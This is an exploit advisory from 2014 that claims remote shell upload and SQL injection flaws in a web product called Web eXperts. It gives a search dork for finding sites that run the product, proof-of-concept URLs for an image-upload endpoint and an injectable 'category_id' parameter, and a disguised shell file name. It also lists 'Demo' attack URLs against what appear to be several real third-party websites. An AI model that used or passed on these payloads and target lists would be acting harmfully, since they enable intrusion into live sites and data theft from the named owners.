Web eXperts suffers from remote shell upload and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
29a0b07f364907ca5a8f9f9460b45a293c40de6d5feebac7fb0362ac7a1255f0
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Web eXperts FileUpload/SQLi vulnerabilities
[+] Date: 14-01-2014
[+] Category: WebApp
[+] Google Dork: :intext:"Website Design & Developed By Web eXperts"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com
########################################################################################
+Exploit:
Web eXperts suffers from a File Upload/SQLi vulnerabilities
1/File Upload:
+P.O.C:
127.0.0.1/[PATH]/addons/imagelibrary/insert_image.php?wysiwyg=
Shell path:
site.ltd/uploads/h4x3d.php.jpg
2/SQli:
127.0.0.1/products.php?category_id=sql
Demo:
http://www.strivesports.com//products.php?category_id=1'
http://www.hangal.com.pk/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.strivesports.com/addons/imagelibrary/insert_image.php?wysiwyg=
http://www.sarsonss.com/products.php?category_id=1'
http://www.sirgeeintl.com/products.php?category_id=1'
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################